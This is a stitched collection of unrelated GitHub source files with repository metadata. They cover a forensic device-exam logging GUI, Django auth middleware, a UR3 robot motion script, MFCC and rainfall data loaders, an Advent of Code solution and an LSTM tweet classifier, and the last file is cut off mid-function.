import sqlite3 import sys import datetime from collections import defaultdict from stats_ui_window import Ui_StatWindow from PyQt5 import QtCore, QtGui, QtWidgets class MainWindow_EXEC(): def __init__(self): app = QtWidgets.QApplication(sys.argv) MainWindow = QtWidgets.QMainWindow() self.ui = Ui_StatWindow() self.ui.setupUi(MainWindow) with open('examiners_names.txt','r') as examiners: for line in examiners.readlines(): self.ui.comboBox.addItem(line.strip()) self.device_list = [] self.ui.pushButton.clicked.connect(self.add_device) self.ui.pushButton_4.clicked.connect(self.remove_record) self.ui.pushButton_2.clicked.connect(self.add_list) self.ui.pushButton_3.clicked.connect(QtCore.QCoreApplication.instance().quit) MainWindow.show() sys.exit(app.exec_()) def add_device(self): device_values = defaultdict() device_values['case_number'] = self.ui.lineEdit.text() device_values['item_number'] = self.ui.lineEdit_2.text() device_values['manufacture'] = self.ui.lineEdit_3.text() device_values['model_'] = self.ui.lineEdit_4.text() device_values['crime_code'] = self.ui.lineEdit_6.text() device_values['requesting'] = self.ui.lineEdit_5.text() device_values['examiner'] = str(self.ui.comboBox.currentText()) if "" in (device_values['case_number'],device_values['item_number'], device_values['manufacture'],device_values['model_'], device_values['crime_code'],device_values['requesting']): self.error_box() else: all_items = True if self.ui.radioButton_11.isChecked(): device_values['device'] = "Computer" elif self.ui.radioButton_10.isChecked(): device_values['device'] = "Phone" elif self.ui.radioButton_12.isChecked(): device_values['device'] = "Hard Drive" elif self.ui.radioButton_13.isChecked(): device_values['device'] = "Thumbdrive/Media Card" elif self.ui.radioButton_14.isChecked(): device_values['device'] = "Vehilce" else: all_items = False self.error_box(message = "Please Select Device Type") if self.ui.radioButton.isChecked(): device_values['security'] = "Password Protected" elif self.ui.radioButton_9.isChecked(): device_values['security'] = "Unlocked" else: all_items = False self.error_box(message = "Please Select Security") if self.ui.checkBox_2.isChecked(): device_values['secure_start'] = "Enabled" else: device_values['secure_start'] = "No" if self.ui.checkBox_3.isChecked(): device_values['logical'] = "Yes" else: device_values['logical'] = "No" if self.ui.checkBox_4.isChecked(): device_values['file_system'] = "Yes" else: device_values['file_system'] = "No" if self.ui.checkBox_5.isChecked(): device_values['physical'] = "Yes" else: device_values['physical'] = "No" if self.ui.checkBox_8.isChecked(): device_values['lt_greykey'] = "Yes" else: device_values['lt_greykey'] = "No" if self.ui.checkBox_6.isChecked(): device_values['greykey'] = "Yes" else: device_values['greykey'] = "No" if self.ui.checkBox_7.isChecked(): device_values['no_extraction'] = "No Extraction" else: device_values['no_extraction'] = "Extracted" device_values['date'] = datetime.datetime.now().strftime('%m/%d/%Y') if all_items == True: self.device_list.append(device_values) self.ui.tableWidget.insertRow(0) self.ui.tableWidget.setItem(0 , 0, QtWidgets.QTableWidgetItem(device_values['date'])) self.ui.tableWidget.setItem(0 , 1, QtWidgets.QTableWidgetItem(device_values['device'])) self.ui.tableWidget.setItem(0 , 2, QtWidgets.QTableWidgetItem(device_values['case_number'])) self.ui.tableWidget.setItem(0 , 3, QtWidgets.QTableWidgetItem(device_values['item_number'])) self.ui.tableWidget.setItem(0 , 4, QtWidgets.QTableWidgetItem(device_values['manufacture'])) self.ui.tableWidget.setItem(0 , 5, QtWidgets.QTableWidgetItem(device_values['model_'])) self.ui.lineEdit_2.setText("") self.ui.lineEdit_3.setText("") self.ui.lineEdit_4.setText("") self.ui.checkBox_2.setChecked(False) self.ui.checkBox_3.setChecked(False) self.ui.checkBox_4.setChecked(False) self.ui.checkBox_5.setChecked(False) self.ui.checkBox_6.setChecked(False) self.ui.checkBox_7.setChecked(False) self.ui.checkBox_8.setChecked(False) else: all_items = True def remove_record(self): row = self.ui.tableWidget.currentRow() self.ui.tableWidget.removeRow(row) def add_list(self): manufacture = self.ui.lineEdit_3.text() if manufacture != "": self.error_box(message = "Dont forget to add the phone") else: self.ui.lineEdit.setText("") self.ui.lineEdit_2.setText("") self.ui.lineEdit_3.setText("") self.ui.lineEdit_4.setText("") self.ui.lineEdit_6.setText("") self.ui.lineEdit_5.setText("") count = self.ui.tableWidget.rowCount() if count > 0: self.ui.tableWidget.setRowCount(0) with open('path.txt','r') as my_path: path = my_path.read() con = sqlite3.connect(path) cur = con.cursor() for item in self.device_list: val = (item['date'],item['case_number'],item['item_number'],item['manufacture'], item['model_'],item['crime_code'],item['requesting'], item['examiner'],item['device'],item['security'], item['secure_start'],item['logical'],item['file_system'], item['physical'],item['lt_greykey'],item['greykey'],item['no_extraction']) sql = "INSERT INTO entries (date,case_number,item_number,manufacture,model_,crime_code,requesting,examiner,device,security,secure_start,logical,file_system,physical,lt_greykey,greykey,no_extraction) VALUES (?,?, ?, ?, ?, ?, ?, ?,?, ?,?,?,?,?,?,?,?)" cur.execute(sql,val) con.commit() con.close() @staticmethod def error_box(message = 'Please fill out all fields!'): error_dialog = QtWidgets.QMessageBox() error_dialog.setIcon(QtWidgets.QMessageBox.Warning) error_dialog.setWindowTitle('Error') error_dialog.setText(f'{message}') error_dialog.setStandardButtons(QtWidgets.QMessageBox.Close) error_dialog.exec() if __name__ == "__main__": MainWindow_EXEC()
chrisw706/examination_stats
Stats/Python/Stats.py
Stats.py
py
7,488
python
en
code
0
github-code
6
33595344312
from django.http import JsonResponse from base.views import chekctoken WHITE_URLS = ( '/apis/login/') class RequestMideleware(object): def process_request(self, request): if request.path_info in WHITE_URLS: return try: ret = chekctoken(request) if not ret: response =JsonResponse({'result': 'Unauthorized'}) response.status_code = 401 return response except: return
Hchenwy/web
www/server/base/middleware.py
middleware.py
py
514
python
en
code
0
github-code
6
24961044066
#!/usr/bin/env python from std_msgs.msg import String from math import pi from sensor_msgs.msg import PointCloud2 import rospy import sensor_msgs.point_cloud2 as pc2 import ros_numpy import numpy as np import sys import copy import moveit_commander import moveit_msgs.msg import geometry_msgs.msg # UR Robot robot = None group = None scene = None display_trajectory_publisher = None init_pose = (-0.2784,0.092,0.42,0.073,0.695,0.711,0.0717) capture_ready = False # UR Robot initialization def ur3_init(): global robot,group,scene,display_trajectory_publisher ## First initialize moveit_commander and rospy. #print "============ Starting system" moveit_commander.roscpp_initialize(sys.argv) #rospy.init_node('move_group_python_interface_tutorial', # anonymous=True) ## Instantiate a RobotCommander object. This object is an interface to ## the robot as a whole. robot = moveit_commander.RobotCommander() ## Instantiate a PlanningSceneInterface object. This object is an interface ## to the world surrounding the robot. scene = moveit_commander.PlanningSceneInterface() ## Instantiate a MoveGroupCommander object. This object is an interface ## to one group of joints. In this case the group is the joints in the ur3 ## arm. This interface can be used to plan and execute motions on the ur3 ## arm. group = moveit_commander.MoveGroupCommander("ur3") ## We create this DisplayTrajectory publisher which is used below to publish ## trajectories for RVIZ to visualize. display_trajectory_publisher = rospy.Publisher( '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory) # Set robot goal based on end_effector def ur3_set_end_effector_goal_quat(pos_x,pos_y,pos_z,qx,qy,qz,qw): global robot,group,scene,display_trajectory_publisher current_pose = group.get_current_pose().pose #print ("Original Pose Information") #print (current_pose) # XYZ are in terms of meters x = 0 y = 0 z = 0 #Yaw,pitch and roll should be in degree # They are all relative to base link coorindates roll = 10 yaw = 183 pitch = 180 pose_goal = geometry_msgs.msg.Pose() #Q = euler_to_quaternion(yaw , pitch, roll) #print Q pose_goal.orientation.x = qx pose_goal.orientation.y = qy pose_goal.orientation.z = qz pose_goal.orientation.w = qw pose_goal.position.x = pos_x pose_goal.position.y = pos_y pose_goal.position.z = pos_z group.set_pose_target(pose_goal) plan = group.go(wait=True) group.stop() current_pose = group.get_current_pose().pose #print ("------------ Target Pose Information ------------") #print (current_pose) group.clear_pose_targets() #print ("[INFO] Goal of end effector is arrived")
vincent51689453/ur3_edge_follower
src/edge_follower/ur_robot.py
ur_robot.py
py
2,802
python
en
code
0
github-code
6
9137033058
import os import pandas as pd from scipy.io import loadmat def load_data(): list_of_files = os.listdir("data\\Identification\\MFCC\\") cumulative_df = pd.DataFrame() for file in list_of_files: data_set = loadmat("data\\Identification\\MFCC\\" + file) features = data_set['feat'] labels = data_set['Y'] features_df = pd.DataFrame(features) labels_df = pd.DataFrame(labels, columns=["Subject", "Session"]) combined_df = pd.concat([features_df, labels_df], axis=1) cumulative_df = pd.concat( [cumulative_df, combined_df]).sort_values(by="Subject") return cumulative_df def load_file(filename): data_set = loadmat("data\\Identification\\MFCC\\" + str(filename)) features = data_set['feat'] labels = data_set['Y'] features_df = pd.DataFrame(features) labels_df = pd.DataFrame(labels, columns=["Subject", "Session"]) combined_df = pd.concat([features_df, labels_df], axis=1) return combined_df
PGG106/ReadMat
utils.py
utils.py
py
1,004
python
en
code
0
github-code
6
37188371889
import os import csv import math import numpy as np import nltk from nltk.corpus import stopwords import collections import string import re from sklearn.model_selection import KFold from keras.models import Sequential from keras.layers import Dense from keras.layers import LSTM from keras.layers.embeddings import Embedding from keras.preprocessing import sequence from keras.preprocessing.text import Tokenizer import time cachedStopWords = stopwords.words("english") if __name__ == '__main__': print("Starting Main") startTime = time.time() x = [] y = [] fraud = [] radical = [] violence = [] with open("annotPart1.csv",'r', encoding="utf8") as csvFile: reader = csv.reader(csvFile) p = 0 for row in reader: if(len(row) == 5 and p != 0): x.append(row[1]) temp = [] temp.append(0 if row[2] == '0' else 1) temp.append(0 if row[3] == '0' else 1) temp.append(0 if row[4] == '0' else 1) fraud.append(0 if row[2] == '0' else 1) radical.append(0 if row[3] == '0' else 1) violence.append(0 if row[4] == '0' else 1) y.append(temp) p = p + 1 csvFile.close with open("annot_part2.csv",'r', encoding="utf8") as csvFile: reader = csv.reader(csvFile) p = 0 for row in reader: if(len(row) == 5 and p != 0): x.append(row[1]) temp = [] temp.append(0 if row[2] == '0' else 1) temp.append(0 if row[3] == '0' else 1) temp.append(0 if row[4] == '0' else 1) fraud.append(0 if row[2] == '0' else 1) radical.append(0 if row[3] == '0' else 1) violence.append(0 if row[4] == '0' else 1) y.append(temp) p = p + 1 csvFile.close print("Size of x:",len(x)," Size of y:",len(y)) X = [] for t in x: t = re.sub(r'[^\w\s]',' ',t) t = ' '.join([word for word in t.split() if word != " "]) t = t.lower() t = ' '.join([word for word in t.split() if word not in cachedStopWords]) X.append(t) print("Type of X:",type(X)) Features = X Fraud = fraud Radical = radical Violence = violence kf = KFold(n_splits=10) iteration = 0 gFraudAccu = 0 gRadicalAccu = 0 gViolenceAccu = 0 gTotalAccu = 0 vocabSize = 50000 tokenizer = Tokenizer(num_words= vocabSize) tokenised = tokenizer.fit_on_texts(X) for train_index, test_index in kf.split(Features): iteration += 1 print("\n\n\n\nMaking nueral Network for iteration:",iteration) iterStart = time.time() #Making Training and Testing Data X_Train = [Features[x] for x in train_index] X_Test = [Features[x] for x in test_index] fraudTrain = [Fraud[x] for x in train_index] fraudTest = [Fraud[x] for x in test_index] radicalTrain = [Radical[x] for x in train_index] radicalTest = [Radical[x] for x in test_index] violenceTrain = [Violence[x] for x in train_index] violenceTest = [Violence[x] for x in test_index] tokenisedTrain = tokenizer.texts_to_sequences(X_Train) tokenisedTest = tokenizer.texts_to_sequences(X_Test) max_review_length = 180 X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post') X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post') #Fraud fraudModel = Sequential() fraudModel.add(Embedding(50000, 100, input_length=max_review_length)) fraudModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2)) fraudModel.add(Dense(1, activation='sigmoid')) fraudModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) fraudModel.fit(X_Train,fraudTrain,epochs=10, batch_size=100) fraudScore = fraudModel.evaluate(X_Test,fraudTest,verbose = 100) accuFraudLstm = fraudScore[1] fraudEndTime = time.time() print("\nFraud Training Done for Iteration",iteration,"\nTime:",fraudEndTime - iterStart) positiveFraud = [x for x in fraudTest if x == 1] print("Number of positive Examples : ",len(positiveFraud), " ratio : ", (len(positiveFraud) / len(fraudTest)) ) #Radical radicalModel = Sequential() radicalModel.add(Embedding(50000, 100, input_length=max_review_length)) radicalModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2)) radicalModel.add(Dense(1, activation='sigmoid')) radicalModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) radicalModel.fit(X_Train,radicalTrain,epochs=10, batch_size=100) radicalScore = radicalModel.evaluate(X_Test,radicalTest,verbose = 100) accuRadicalLstm = radicalScore[1] radicalEndTime = time.time() print("\nRadical Training Done for Iteration",iteration,"\nTime:",radicalEndTime - fraudEndTime) positiveRadical = [x for x in radicalTest if x == 1] print("Number of positive Examples : ",len(positiveRadical), " ratio : ", (len(positiveRadical) / len(radicalTest)) ) #Violence violenceModel = Sequential() violenceModel.add(Embedding(50000, 100, input_length=max_review_length)) violenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2)) violenceModel.add(Dense(1, activation='sigmoid')) violenceModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) violenceModel.fit(X_Train,violenceTrain,epochs=10, batch_size=100) violenceScore = violenceModel.evaluate(X_Test,violenceTest,verbose = 100) accuViolenceLstm = violenceScore[1] violenceEndTime = time.time() print("\nViolence Training Done for Iteration",iteration,"\nTime:",violenceEndTime - radicalEndTime) positiveViolence = [x for x in violenceTest if x == 1] print("Number of positive Examples : ",len(positiveViolence), " ratio : ", (len(positiveViolence) / len(violenceTest)) ) totalAccu = (accuViolenceLstm + accuRadicalLstm + accuFraudLstm) / 3 gFraudAccu += accuFraudLstm gViolenceAccu += accuViolenceLstm gRadicalAccu += accuRadicalLstm gTotalAccu += totalAccu iterEndTime = time.time() print("\n\nAccuracyScores for LSTM Iteration:",iteration,"\nFraud: ",accuFraudLstm,"\nRadical: ",accuRadicalLstm,"\nViolence: ",accuViolenceLstm,"\nTotal Accuracy:",totalAccu,"\nTotal Time:",iterEndTime - iterStart) gFraudAccu /= 10 gViolenceAccu /= 10 gRadicalAccu /= 10 gTotalAccu /= 10 endTime = time.time() print("\n\n\n\nOverall AccuracyScores for LSTM :","\nFraud: ",gFraudAccu,"\nRadical: ",gRadicalAccu,"\nViolence: ",gViolenceAccu,"\nTotal Accuracy:",gTotalAccu,"\nTime:",endTime - startTime)
arinjayakhare1/Real-Time-Tweet-Classifier-using-RLAN
test/old codes/testWithThreads/initTrainer/old Programs/initTrainer.py
initTrainer.py
py
6,270
python
en
code
0
github-code
6
11706943391
from string import ascii_lowercase, ascii_uppercase from utils.data import read_data_as_list characters = list(ascii_lowercase) + list(ascii_uppercase) priority_lookup = dict(zip(characters, range(1, len(characters) + 1))) rucksacks = read_data_as_list(day=3) # Part 1 total = 0 for rucksack in rucksacks: midpoint = len(rucksack) // 2 compartment_1, compartment_2 = rucksack[:midpoint], rucksack[midpoint:] common_item = set(compartment_1).intersection(compartment_2).pop() priority = priority_lookup[common_item] total += priority print(f'Part 1 Solution: {total}') # Part 2 total = 0 for i in range(0, len(rucksacks), 3): rucksack_1, rucksack_2, rucksack_3 = rucksacks[i: i+3] common_item = set(rucksack_1).intersection(rucksack_2).intersection(rucksack_3).pop() priority = priority_lookup[common_item] total += priority print(f'Part 2 Solution: {total}')
stuartjwright/advent_of_code_2022
day_03.py
day_03.py
py
902
python
en
code
0
github-code
6
73499996027
import numpy as np from numpy import ma import xarray as xr from netCDF4 import Dataset import struct import sys import os import datetime as dt import glob """ This module contains functions for reading external data to use with LPT. The data_read_function is called at various points in other LPT functions. To add a new data set, do the following: 1) Write a read function similar to read_generic_netcdf below. 2) Add an "elif" option that calls that function in readdata """ ################################################################################ def readdata(datetime_to_read, dataset_options_dict, verbose=None): """ Main data read function. Get data at datetime datetime_to_read. Based on the oprions in dataset_options_dict, it will look in the data directory and use the rain function specified below. To add a dataset type, add an elif block to this function. The function is expected to return a dictionary with keys 'lon', 'lat', and 'data' Verbose option (new 05/2023): - If set to None (default), it will use the verbose option from dataset_options_dict. - Otherwise, the value will be used *instead of* dataset_options_dict. This allows a function call to override the setting in dataset_options_dict. """ ## Manage verbose if verbose is None: verbose_actual = dataset_options_dict['verbose'] else: verbose_actual = verbose if dataset_options_dict['raw_data_format'] == 'generic_netcdf': variable_names = (dataset_options_dict['longitude_variable_name'] , dataset_options_dict['latitude_variable_name'] , dataset_options_dict['field_variable_name']) DATA = read_generic_netcdf_at_datetime(datetime_to_read , variable_names = variable_names , data_dir = dataset_options_dict['raw_data_parent_dir'] , fmt = dataset_options_dict['file_name_format'] , verbose = verbose_actual) elif dataset_options_dict['raw_data_format'] == 'generic_netcdf_with_multiple_times': variable_names = (dataset_options_dict['longitude_variable_name'] , dataset_options_dict['latitude_variable_name'] , dataset_options_dict['time_variable_name'] , dataset_options_dict['field_variable_name']) DATA = read_generic_netcdf_at_datetime(datetime_to_read , variable_names = variable_names , dt_to_use = datetime_to_read , data_dir = dataset_options_dict['raw_data_parent_dir'] , fmt = dataset_options_dict['file_name_format'] , verbose = verbose_actual) elif dataset_options_dict['raw_data_format'] == 'cmorph': DATA = read_cmorph_at_datetime(datetime_to_read , area = dataset_options_dict['area'] , data_dir = dataset_options_dict['raw_data_parent_dir'] , fmt = dataset_options_dict['file_name_format'] , verbose = verbose_actual) elif dataset_options_dict['raw_data_format'] == 'imerg_hdf5': DATA = read_imerg_hdf5_at_datetime(datetime_to_read , area = dataset_options_dict['area'] , data_dir = dataset_options_dict['raw_data_parent_dir'] , fmt = dataset_options_dict['file_name_format'] , verbose = verbose_actual) elif dataset_options_dict['raw_data_format'] == 'cfs_forecast': fcst_hour = int((datetime_to_read - dataset_options_dict['datetime_init']).total_seconds()/3600) fcst_resolution_hours = dataset_options_dict['data_time_interval'] if fcst_hour < 1: # There is no data in the file for fcst = 0. Use 6h fcst values. records = [1,] else: records = [int(fcst_hour/fcst_resolution_hours),] DATA = read_cfs_rt_at_datetime(dataset_options_dict['datetime_init'] # datetime_to_read , data_dir = dataset_options_dict['raw_data_parent_dir'] , fmt = dataset_options_dict['file_name_format'] , records = records , verbose = verbose_actual) DATA['data'] = ma.masked_array(DATA['precip'][0]) ## -- Add an elif block here for new datasets. -- else: print(('ERROR! '+dataset_options_dict['raw_data_format'] + ' is not a valid raw_data_format!'), flush=True) DATA = None return DATA ################################################################################ ## Read functions for generic NetCDF data. ################################################################################ def read_generic_netcdf(fn, variable_names=('lon','lat','rain'), dt_to_use=None): """ DATA = read_generic_netcdf(fn) output is like this: list(DATA) Out[12]: ['lon', 'lat', 'precip'] In [21]: DATA['lon'].shape Out[21]: (1440,) In [22]: DATA['lat'].shape Out[22]: (400,) In [23]: DATA['precip'].shape Out[23]: (400, 1440) """ DATA = {} with xr.open_dataset(fn) as DS: DATA['lon'] = DS[variable_names[0]].values DATA['lat'] = DS[variable_names[1]].values ## If no time variable, just retrieve the 2-D data as it is. if not dt_to_use is None: #'time' in list(DS.variables): DATA['data'] = DS.sel({variable_names[2]:str(dt_to_use)},method='nearest')[variable_names[3]].values else: DATA['data'] = DS[variable_names[2]].values DATA['data'] = np.ma.masked_array(DATA['data'], mask=np.isnan(DATA['data'])) ## Need to get from (-180, 180) to (0, 360) longitude. lon_lt_0, = np.where(DATA['lon'] < -0.0001) lon_ge_0, = np.where(DATA['lon'] > -0.0001) if len(lon_lt_0) > 0: DATA['lon'][lon_lt_0] += 360.0 DATA['lon'] = np.concatenate((DATA['lon'][lon_ge_0], DATA['lon'][lon_lt_0])) DATA['data'] = np.concatenate((DATA['data'][:,lon_ge_0], DATA['data'][:,lon_lt_0]), axis=1) return DATA def read_generic_netcdf_at_datetime(dt, data_dir='.' , variable_names=('lon','lat','rain'), dt_to_use=None, fmt='gridded_rain_rates_%Y%m%d%H.nc' , verbose=False): fn = (data_dir + '/' + dt.strftime(fmt)) DATA=None if not os.path.exists(fn): print('File not found: ', fn) else: if verbose: print(fn) DATA=read_generic_netcdf(fn, variable_names = variable_names, dt_to_use = dt_to_use) return DATA ################################################################################ ## Read functions for specific datasets. ################################################################################ """ CMORPH reading functions. """ def read_cmorph_rt_bin(fn, area=[0,360,-90,90]): """ DATA = read_cmorph_rt_bin(fn) DATA is a dict with keys lon, lat, and precip. CMORPH RT files are binary. The GrADS control file below is used as the basis for this function: DSET ^../%y4/%y4%m2/CMORPH_V0.x_RT_8km-30min_%y4%m2%d2%h2 OPTIONS little_endian template UNDEF -999.0 TITLE CMORPH Rain Rate (Real-Time Version) XDEF 4948 LINEAR 0.0363783345 0.072756669 YDEF 1649 LINEAR -59.963614312 0.072771376 ZDEF 1 LEVELS 1 TDEF 99999 LINEAR 00:00z01Jan2017 30mn VARS 1 cmorph 1 99 CMORPH Rain Rate [mm/hr] ENDVARS """ dtype=np.dtype([('field1', '<i2')]) DATA={} DATA['lon'] = np.arange(0.0363783345, 360.0, 0.072756669) DATA['lat'] = np.arange(-59.963614312, 60.0, 0.072771376) fid = open(fn,'rb') ## GrADS uses FORTRAN REAL values, which is np.float32 for Python. DATA['data'] = np.fromfile(fid, dtype=np.float32, count=2*4948*1649) if sys.byteorder == 'big': # Data is little endian. DATA['data'] = DATA['data'].byteswap() ## Shape and scale the data. DATA['data'] = np.reshape(np.double(DATA['data']), [2, 1649, 4948]) DATA['data'][DATA['data'] < -0.001] = 0.0 # Usually, missing high latitude data. fid.close() ## Cut out area. keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1])) keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3])) DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1] DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1] DATA['data'] = DATA['data'][:, keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1] DATA['data'] = 0.5*(DATA['data'][0,:,:] + DATA['data'][1,:,:]) return DATA def read_cmorph_at_datetime(dt_this, force_rt=False, data_dir='.' , fmt='CMORPH_V0.x_RT_8km-30min_%Y%m%d%H' , verbose=False, area=[0,360,-90,90]): """ DATA = read_cmorph_at_datetime(dt, force_rt=False, verbose=False) DATA is a dict with keys lon, lat, and precip. Based on the provided datetime dt, read in the CMORPH data. By default, it will first check for the research product, and use the realtime product if the research product was not found. However, if force_rt = True, it just uses the realtime product. """ ## First try research product fn = (data_dir + '/' + dt_this.strftime(fmt)) if verbose: print(fn) DATA = read_cmorph_rt_bin(fn, area=area) DATA['data'] = ma.masked_array(DATA['data']) return DATA def read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.' , fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5' , verbose=False, area=[0,360,-90,90]): """ DATA = read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.' , fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5' , verbose=False, area=[0,360,-90,90]) DATA is a dict with keys lon, lat, and precip. Based on the provided datetime dt, read in the IMERG HDF data. By default, it will first check for the final product, and use the "late" realtime product if the final product was not found. However, if force_rt = True, it just uses the "late" realtime product. (It will search for a filename with modified fmt to check for "late" product - append 'late/' to the front of the directory path. - replace '3B-HHR' with '3B-HHR-L'). """ fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt))) if len(fn_list) < 1: if not force_rt: ## Try "late" realtime data. print('Final data version not found. Trying to use late realtime data instead.') fmt_rt = 'late/' + fmt.replace('3B-HHR','3B-HHR-L') fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt_rt))) if len(fn_list) < 1: print('WARNING: No input data found.') fn = fn_list[0] if verbose: print(fn) with Dataset(fn) as DS: lon_rain = DS['Grid']['lon'][:] lat_rain = DS['Grid']['lat'][:] rain = DS['Grid']['precipitationCal'][:][0].T if len(fn_list) > 1: fn = fn_list[1] if verbose: print(fn) with Dataset(fn) as DS: rain30 = DS['Grid']['precipitationCal'][:][0].T rain = 0.5 * (rain + rain30) ## lon -180:0 --> 180:360 idx_neg_lon = [x for x in range(len(lon_rain)) if lon_rain[x] < -0.0001] idx_pos_lon = [x for x in range(len(lon_rain)) if lon_rain[x] > -0.0001] lon_rain = np.append(lon_rain[idx_pos_lon[0]:idx_pos_lon[-1]+1], 360.0 + lon_rain[idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=0) rain = np.append(rain[:,idx_pos_lon[0]:idx_pos_lon[-1]+1], rain[:,idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=1) DATA={} DATA['lon'] = lon_rain DATA['lat'] = lat_rain DATA['data'] = ma.masked_array(rain) ## Cut out area. keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1])) keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3])) DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1] DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1] DATA['data'] = DATA['data'][keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1] return DATA ################################################################################ ################################################################################ ################################################################################ """ CFS Grib2 reading function """ def read_cfs_rt_at_datetime(dt_this, data_dir = './' , fmt = 'cfs.%Y%m%d/%H/time_grib_01/prate.01.%Y%m%d%H.daily.grb2' , records=range(1,45*4+1), verbose=False): fn = (data_dir + '/' + dt_this.strftime(fmt)) if verbose: print(fn, flush=True) return read_cfs_rt_grib2(fn, records=records, verbose=verbose) def read_cfs_rt_grib2(fn, records=range(1,45*4+1), verbose=False): """ RT = read_cfs_rt_grib2(fn, records=N) N is the list of records to get. By default, get the first 45 days, 6 hourly intervals. example output: In [23]: RT['lon'].shape Out[23]: (384,) In [24]: RT['lat'].shape Out[24]: (190,) In [25]: RT['precip'].shape Out[25]: (180, 190, 384) """ import gdal # Import gdal if dealing with grib data. DS = gdal.Open(fn, gdal.GA_ReadOnly) width = DS.RasterXSize height = DS.RasterYSize lon = np.arange(0.0,359.062 + 0.5,0.938) ## grid file with Gaussian latitude was obtained from wgrib2 like this: ## wgrib2 -d 1 -gridout grid.txt /home/orca/data/model_fcst_grib/cfs/cfs.20190508/00/time_grib_01/prate.01.2019050800.daily.grb2 ## awk -F, '{print $3}' grid.txt | uniq | tr "\n" ", " lat = np.flip(np.array([-89.277, -88.340, -87.397, -86.454, -85.509 , -84.565, -83.620, -82.676, -81.731, -80.786 , -79.841, -78.897, -77.952, -77.007, -76.062 , -75.117, -74.173, -73.228, -72.283, -71.338 , -70.393, -69.448, -68.503, -67.559, -66.614 , -65.669, -64.724, -63.779, -62.834, -61.889 , -60.945, -60.000, -59.055, -58.110, -57.165 , -56.220, -55.275, -54.330, -53.386, -52.441 , -51.496, -50.551, -49.606, -48.661, -47.716 , -46.771, -45.827, -44.882, -43.937, -42.992 , -42.047, -41.102, -40.157, -39.212, -38.268 , -37.323, -36.378, -35.433, -34.488, -33.543 , -32.598, -31.653, -30.709, -29.764, -28.819 , -27.874, -26.929, -25.984, -25.039, -24.094 , -23.150, -22.205, -21.260, -20.315, -19.370 , -18.425, -17.480, -16.535, -15.590, -14.646 , -13.701, -12.756, -11.811, -10.866, -9.921 , -8.976, -8.031, -7.087, -6.142, -5.197 , -4.252, -3.307, -2.362, -1.417, -0.472 , 0.472, 1.417, 2.362, 3.307, 4.252 , 5.197, 6.142, 7.087, 8.031, 8.976 , 9.921, 10.866, 11.811, 12.756, 13.701 , 14.646, 15.590, 16.535, 17.480, 18.425 , 19.370, 20.315, 21.260, 22.205, 23.150 , 24.094, 25.039, 25.984, 26.929, 27.874 , 28.819, 29.764, 30.709, 31.653, 32.598 , 33.543, 34.488, 35.433, 36.378, 37.323 , 38.268, 39.212, 40.157, 41.102, 42.047 , 42.992, 43.937, 44.882, 45.827, 46.771 , 47.716, 48.661, 49.606, 50.551, 51.496 , 52.441, 53.386, 54.330, 55.275, 56.220 , 57.165, 58.110, 59.055, 60.000, 60.945 , 61.889, 62.834, 63.779, 64.724, 65.669 , 66.614, 67.559, 68.503, 69.448, 70.393 , 71.338, 72.283, 73.228, 74.173, 75.117 , 76.062, 77.007, 77.952, 78.897, 79.841 , 80.786, 81.731, 82.676, 83.620, 84.565 , 85.509, 86.454, 87.397, 88.340, 89.277]), axis=0) num_list = [] for band in records: if verbose: print('Record #' + str(band), flush=True) data_array = DS.GetRasterBand(band).ReadAsArray() for row in data_array: for value in row: num_list.append(value*3600.0) # kg/m2/sec --> mm/h DS = None # Close the file. precip = np.array(num_list).reshape([len(records), len(lat), len(lon)]) DATA={} DATA['lon'] = lon DATA['lat'] = lat DATA['precip'] = precip return DATA def read_cfsr_grib2(fn, band_list=None, verbose=False): """ RT = read_cfsr_grib2(fn) example output: In [23]: RT['lon'].shape Out[23]: (384,) In [24]: RT['lat'].shape Out[24]: (190,) In [25]: RT['precip'].shape Out[25]: (180, 190, 384) """ DS = gdal.Open(fn, gdal.GA_ReadOnly) width = DS.RasterXSize height = DS.RasterYSize lon = np.arange(0.0,359.51,0.5) lat = np.arange(90.0,-90.01,-0.5) n_records = DS.RasterCount num_list = [] if band_list is None: band_list = range(1, n_records+1) for band in band_list: if verbose: print((str(band) + ' of ' + str(n_records))) data_array = DS.GetRasterBand(band).ReadAsArray() for row in data_array: for value in row: num_list.append(value) DS = None # Close the file. precip = np.array(num_list).reshape([int(len(band_list)/6), 6, len(lat), len(lon)]) #precip /= 1e6 # Values in file are multiplied by 1e6. # kg/m2 in 1h is equivalent to mm/h. DATA={} DATA['lon'] = lon DATA['lat'] = lat DATA['precip'] = precip return DATA def get_cfsr_6h_rain(dt_ending, verbose=False): """ Read in the rainfall using read_cfs_historical_grib2(fn) Then calculate the 6 hourly rain rate (mm/h) and return it. CFSR rain is stored in monthly files. It it initialized every 6 h, and the data provide hourly accumulations (in kg/m^2, equivalent to mm) like this: 